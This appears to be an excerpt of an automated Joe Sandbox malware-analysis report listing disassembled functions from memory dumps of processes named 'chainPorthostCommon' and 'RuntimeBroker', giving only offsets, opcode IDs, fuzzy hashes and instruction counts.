                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ce0331f1fd5ac050fb68bda5cd30933b6e2ebc632be8c098c41d163f991eda0a
                                                                                    • Instruction ID: 39bcde144d68055130f70fc5d3b91302300cb832faab02ad9652c6d660fe9f3a
                                                                                    • Opcode Fuzzy Hash: ce0331f1fd5ac050fb68bda5cd30933b6e2ebc632be8c098c41d163f991eda0a
                                                                                    • Instruction Fuzzy Hash: 58012612A8D6D20FEB2A97745CB19B23FD4CF8721070901FAD589CB1E3CC5E5C868361
                                                                                    Function 00007FFD343F0C38 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf6847ae8d63ebd66c4a1f2f39095c0d7348fe632a9d5ee38005fcab522c6132
                                                                                    • Instruction ID: 4b00678239cfa313c1df579f2302f8607a62677eab05bd9a972db86c5f821d9d
                                                                                    • Opcode Fuzzy Hash: bf6847ae8d63ebd66c4a1f2f39095c0d7348fe632a9d5ee38005fcab522c6132
                                                                                    • Instruction Fuzzy Hash: 8B11C236B0E78C8FE702EB2898A51DD7FB0EF43310F1545F6C184DB192E93816498781
                                                                                    Function 00007FFD3455608A Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2362677341.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c850f67d184c6ec657b2daa5c0fe828e8812b18df6a7fdd18846dba52438fdc6
                                                                                    • Instruction ID: 248679063f8cc668fe55a6be568170d8ac247f80ca3de17dd47b66c0975963e4
                                                                                    • Opcode Fuzzy Hash: c850f67d184c6ec657b2daa5c0fe828e8812b18df6a7fdd18846dba52438fdc6
                                                                                    • Instruction Fuzzy Hash: 631112B1A099994FDF9CEB1C84A1AB4B7E1FB54304B0441FAD14DE7192CD36A8C8CB51
                                                                                    Function 00007FFD343F0C40 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e0055a019e28ed7764e063d9d1753e497ffc5c2041896c98c6990a9909edbaa2
                                                                                    • Instruction ID: c47310b7f958e230ee4ffdc2f7e0ec0a59fd9a2810f72563bb3751650f9a85a3
                                                                                    • Opcode Fuzzy Hash: e0055a019e28ed7764e063d9d1753e497ffc5c2041896c98c6990a9909edbaa2
                                                                                    • Instruction Fuzzy Hash: D701C436A0E7888FE702EB28D8A41DD7FB0EF43310F1545E6C180DB192E5385648C781
                                                                                    Function 00007FFD343F5EF1 Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d2714df475ae315f5876ba6722e2cdbb60317ff3c9c98518f8b9ed720572965c
                                                                                    • Instruction ID: 0d43c9792ab89395e9c3522293994f5d1b259a10e799d25567bea4b6fefa6189
                                                                                    • Opcode Fuzzy Hash: d2714df475ae315f5876ba6722e2cdbb60317ff3c9c98518f8b9ed720572965c
                                                                                    • Instruction Fuzzy Hash: BD014422F5CA1E4FE7A4B71C88F57B862A0BF46300F5001B5D90DE32A2ED3C6D45A740
                                                                                    Function 00007FFD343F171D Relevance: .0, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 41a81e2f501f7b202498f626e282896b9fec613f49a340cd8b06a6695a9ec657
                                                                                    • Instruction ID: 57d4c4966154fdd0087c01c7039f4b469fd3002f5d4966176c9237c929a3d2b8
                                                                                    • Opcode Fuzzy Hash: 41a81e2f501f7b202498f626e282896b9fec613f49a340cd8b06a6695a9ec657
                                                                                    • Instruction Fuzzy Hash: D8F0A423F4C91A4BEB58B60898A55E92392DF91310F050776D40DC72D6DE2CAD0287C0
                                                                                    Function 00007FFD343F5F11 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction ID: b710403b9169e36e88c60335b83b09699bc2196bb5289f811a98c9f3d2cc6401
                                                                                    • Opcode Fuzzy Hash: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction Fuzzy Hash: 00011D31E9C51E8AEBA4BA04D8A5AF873A1EF15301F5041F9D90ED31A2EE3C69C55A41
                                                                                    Function 00007FFD343F0C48 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ae6f49a5d267d292664f54071ebcd67099a6a739cc3fcab9b33d4b5c13937cc8
                                                                                    • Instruction ID: fee65fab9e0331adcd332d7e093f5f0dbfcea842bb80ed2b211b1408c3921df4
                                                                                    • Opcode Fuzzy Hash: ae6f49a5d267d292664f54071ebcd67099a6a739cc3fcab9b33d4b5c13937cc8
                                                                                    • Instruction Fuzzy Hash: 4E017136A0E7888FD712EB78C8941DDBFB0EF43314F1545EAD580DB2A2E6385A48D781
                                                                                    Function 00007FFD343F0C50 Relevance: .0, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 49b036f6550f1dcf331c3e2222f6c721b05443f30d9b5dcc949ffd2e573f0d3f
                                                                                    • Instruction ID: b2639f529c9f143c799bb108bc710d0dada48acffc0734fecb7c813628ffad41
                                                                                    • Opcode Fuzzy Hash: 49b036f6550f1dcf331c3e2222f6c721b05443f30d9b5dcc949ffd2e573f0d3f
                                                                                    • Instruction Fuzzy Hash: 4C01A235A0E3888FE712EB7888941DDBFF0EF03304F1541E6C580DB292E9385A48C741
                                                                                    Function 00007FFD343F0B87 Relevance: .0, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c172775434999ab982a50e6798801dc1a6d2b61753b007ec10068316fe9f6c43
                                                                                    • Instruction ID: 00ee83581e5ad0af3d8382b7c48335608e0de075af0e5a326a4fd188eb85fcc7
                                                                                    • Opcode Fuzzy Hash: c172775434999ab982a50e6798801dc1a6d2b61753b007ec10068316fe9f6c43
                                                                                    • Instruction Fuzzy Hash: FCE0263232D54E4FDB02FB3CDC9A8A87B50EB4B21078601FAD008CB0A2C212684E8B01
                                                                                    Function 00007FFD343F10C0 Relevance: .0, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 39d90e58024a9c2db94073a3ee19896d09c53e440049174de8d8b582b493145e
                                                                                    • Instruction ID: d9dab142fee693210aafb43b4c21a371452ac365953f408688fe02885affe872
                                                                                    • Opcode Fuzzy Hash: 39d90e58024a9c2db94073a3ee19896d09c53e440049174de8d8b582b493145e
                                                                                    • Instruction Fuzzy Hash: 11E02621B4C85907EB7CB67828B11B07380DB45310B04017ED40AC32C6CC1E5CC14280
                                                                                    Function 00007FFD343F4265 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction ID: 8ab35fb96451738a2eaf1d17d46a1dcfded36ab21a7857e09b1d3209187fed47
                                                                                    • Opcode Fuzzy Hash: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction Fuzzy Hash: CFE01A32F4811A4AFBA8B248D8E13EA6264EF89304F140078DB5ED33C1ED3CAD409709
                                                                                    Function 00007FFD343F06AD Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction ID: 3bdb383159b4e48e681951c4839018bf330c6cce4d36e3fd029155b77bd53153
                                                                                    • Opcode Fuzzy Hash: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction Fuzzy Hash: BCC08C03FCB54B00B400316E14E20FDA1608FC6220FD00032C30CD2091AC2D20C5214A
                                                                                    Function 00007FFD343F12D8 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction ID: 809ae4613649e19a9b5339611881eaf347527be039668b76ca7d0698284c5c8a
                                                                                    • Opcode Fuzzy Hash: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction Fuzzy Hash: 11C04C345558098FC948FB29C99591477A0FF1E215BD50090E409C7171D669DCD5D741
                                                                                    Function 00007FFD343F06D0 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction ID: a616374053e223a48673d5ad6923f471bcda9665b4193bec270313af214e8151
                                                                                    • Opcode Fuzzy Hash: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction Fuzzy Hash: 4BB01201DD644F00A40431BE08D20B570905F86100FC00070D60CC1085A86D10942242

                                                                                    Non-executed Functions

                                                                                    Function 00007FFD343F09B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                    • API String ID: 0-1692736845
                                                                                    • Opcode ID: 7dd6d58e90e63f1dc0377d82d88cda38c004fd6874c51ff9fae8c794ad698b7d
                                                                                    • Instruction ID: b2192935f956a2547530f6ca54c8bcab80d3ace955cb731b098c97decca3cf48
                                                                                    • Opcode Fuzzy Hash: 7dd6d58e90e63f1dc0377d82d88cda38c004fd6874c51ff9fae8c794ad698b7d
                                                                                    • Instruction Fuzzy Hash: 9351A017B1A46A45E72337FD74611FE6BA8DF82336B584377E14C9B0838C1E61C682E5

                                                                                    Executed Functions

                                                                                    Function 00007FFD347D0879 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: pS4
                                                                                    • API String ID: 0-684799425
                                                                                    • Opcode ID: 31e3c1de1dda1209f20ad5f36b48cd3b89e04631875fa49e5ad6efad6e77367f
                                                                                    • Instruction ID: d94813628f09059628e7bfbddbf4f8375f80fbe27916900860efd3fcf6f32a22
                                                                                    • Opcode Fuzzy Hash: 31e3c1de1dda1209f20ad5f36b48cd3b89e04631875fa49e5ad6efad6e77367f
                                                                                    • Instruction Fuzzy Hash: CBD13CB1B2E9C9CFE768DA2888A55B837D1FF87318B0411B9D14EC7592DD1CB80A97C1
                                                                                    Function 00007FFD343E0D48 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5Z_H
                                                                                    • API String ID: 0-3267294416
                                                                                    • Opcode ID: 94d0fde9450c1993e31798c7fecc42066014a41a23e03a6829b425ed9e6634aa
                                                                                    • Instruction ID: d64b15dd931766f9c83bb9221fc7eb5200690f844fa2f22781dbfd90c30e381e
                                                                                    • Opcode Fuzzy Hash: 94d0fde9450c1993e31798c7fecc42066014a41a23e03a6829b425ed9e6634aa
                                                                                    • Instruction Fuzzy Hash: EE91F3B2B19A9D8FE795EB9C88657E97BE1FB96300F0400BBC049D72D2DE791812D740
                                                                                    Function 00007FFD347DCAC0 Relevance: .9, Instructions: 895COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f06b187a617732fadba228ff62216279cc6a2a62d78a27813c5fc030ac22350f
                                                                                    • Instruction ID: f94b741a165f78452776f00b5b4fb8113eaa08f25cf360cfe94f5b4985af4c9c
                                                                                    • Opcode Fuzzy Hash: f06b187a617732fadba228ff62216279cc6a2a62d78a27813c5fc030ac22350f
                                                                                    • Instruction Fuzzy Hash: 97521670A1D649CFDB99DB18C8A5AB977E1FF87310F1401B9D14EC7192DA28BC4ACB81
                                                                                    Function 00007FFD347D58A9 Relevance: .4, Instructions: 397COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bcee28c500048977c8bee525b3500f868e2b357c9bcd9d498e27eddb2216f38e
                                                                                    • Instruction ID: 62c928d1782d6f96519dcc38607e7a944ed554025e4bda38ba273b42b37127cd
                                                                                    • Opcode Fuzzy Hash: bcee28c500048977c8bee525b3500f868e2b357c9bcd9d498e27eddb2216f38e
                                                                                    • Instruction Fuzzy Hash: 05C105B1B2E549CFE7E8DA1888A65B83BD1FF47350B140279D15EC7592DE2CB80A97C0
                                                                                    Function 00007FFD343E0E43 Relevance: .2, Instructions: 171COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26f8b5fbca28047435cb12005a4c15c55474873f4c1f63f65d0b022901229176
                                                                                    • Instruction ID: fbd7374e78baed3a41c69ff4e8b1a307a30ecf7c4a26efef552c98e227d8172d
                                                                                    • Opcode Fuzzy Hash: 26f8b5fbca28047435cb12005a4c15c55474873f4c1f63f65d0b022901229176
                                                                                    • Instruction Fuzzy Hash: BE51E0B2B18A5D8BE798EB9C98657E97BE1FB9A314F50017EC00AD3391DAB91452C700
                                                                                    Function 00007FFD347D9B31 Relevance: 1.7, Strings: 1, Instructions: 492COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: xqD4
                                                                                    • API String ID: 0-1868377020
                                                                                    • Opcode ID: f908433729c5a26e36787d8d9dc897df0a8e915014a74284684ce7907ca15c65
                                                                                    • Instruction ID: 4dcae65e69a554b40bb7ebfe31b7319b117f01102775e7a38ee0109d99cd7382
                                                                                    • Opcode Fuzzy Hash: f908433729c5a26e36787d8d9dc897df0a8e915014a74284684ce7907ca15c65
                                                                                    • Instruction Fuzzy Hash: 4102D3B0A2EA4ACFD369DB28C4E157977A1FF47300B14457EC14EC3682DA2DB8499B81
                                                                                    Function 00007FFD347DC79B Relevance: 1.6, Strings: 1, Instructions: 313COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `){4
                                                                                    • API String ID: 0-3229680120
                                                                                    • Opcode ID: 6c8481de46c7313b9e0c25e9e13ec92605f7b2877122d0a153e65b0ac0d6df6c
                                                                                    • Instruction ID: 933d8bfa89c511456fe16384dc3f96e25b6a4777166c6869f6e70ec320173789
                                                                                    • Opcode Fuzzy Hash: 6c8481de46c7313b9e0c25e9e13ec92605f7b2877122d0a153e65b0ac0d6df6c
                                                                                    • Instruction Fuzzy Hash: 86B1B370A2D68ECFEB65DB6488A16F87BA0EF4B300F1401BAD14ED7181DA3C7949D790
                                                                                    Function 00007FFD347D15AB Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: S4
                                                                                    • API String ID: 0-610221366
                                                                                    • Opcode ID: 164072062b1de6929f0cce79f08ab4dd134dbbe2abd37851f4d6eadb21cbdf29
                                                                                    • Instruction ID: ed85edb4c3eaa9e4fa8d077f949e83888c07b14b6bc0bd3ef5476e08e2673806
                                                                                    • Opcode Fuzzy Hash: 164072062b1de6929f0cce79f08ab4dd134dbbe2abd37851f4d6eadb21cbdf29
                                                                                    • Instruction Fuzzy Hash: 2981BF70E2E64ACFEB55EB6488A06BD7BA5EF5B300F14057AD10ED3192DE2C7845E780
                                                                                    Function 00007FFD347D0597 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: M
                                                                                    • API String ID: 0-3664761504
                                                                                    • Opcode ID: 9ec6be2cf743979a0d9ea3f75b50f4d21751718cdce5517d395cfedcfe34b69d
                                                                                    • Instruction ID: 1f24a333e56adc14d5e899d85fee624994d9fab6ddfdf67251c583bb5e992d95
                                                                                    • Opcode Fuzzy Hash: 9ec6be2cf743979a0d9ea3f75b50f4d21751718cdce5517d395cfedcfe34b69d
                                                                                    • Instruction Fuzzy Hash: 28510471A1E6C99FDB429B3488A44E97FB0EF07314F0800FAC149DB193CA2D784ACB81
                                                                                    Function 00007FFD347D08BE Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: pS4
                                                                                    • API String ID: 0-684799425
                                                                                    • Opcode ID: 180de8c951001c3fe394baaf49d36823e9a950fb66ac4cb743cc80e25fdff773
                                                                                    • Instruction ID: 29c4ff032d57c739d95140c72773c0de8cd7a9f1fc24ecacc1621e3fff8fa8e4
                                                                                    • Opcode Fuzzy Hash: 180de8c951001c3fe394baaf49d36823e9a950fb66ac4cb743cc80e25fdff773
                                                                                    • Instruction Fuzzy Hash: E8510B7172D989CFE794DB2C98A56B837D1FF9A314F0401B9D54DC3292DD28BC098780
                                                                                    Function 00007FFD347D3828 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 22bfa430db9ea7fd50dbefd95baf656ebc12713ec3f7c6299913f7ec5e9bd570
                                                                                    • Instruction ID: 82b48072606b8c06518232359d93faaf39ec2fcb0c9044f8e8d437112b77b981
                                                                                    • Opcode Fuzzy Hash: 22bfa430db9ea7fd50dbefd95baf656ebc12713ec3f7c6299913f7ec5e9bd570
                                                                                    • Instruction Fuzzy Hash: 3A517AB1E1950E8FEB58DB98D4A55FCB7B1FF46310F1041BAC01AE7286CA396906DB90
                                                                                    Function 00007FFD343E08D0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: 4de02b6566ec6ffb681d659cb57d115a4ccd1a9e1e03ca245fb12db1f45a581a
                                                                                    • Instruction ID: 1d11f3727f6bd10f0c7585d3c369f1028d03f781c203b70f523b6f750ed05789
                                                                                    • Opcode Fuzzy Hash: 4de02b6566ec6ffb681d659cb57d115a4ccd1a9e1e03ca245fb12db1f45a581a
                                                                                    • Instruction Fuzzy Hash: 82412712B0E6650AE716F7BC64B56FA7B90DF46325B1804BFD14EC71D3CD2968818281
                                                                                    Function 00007FFD347D8878 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
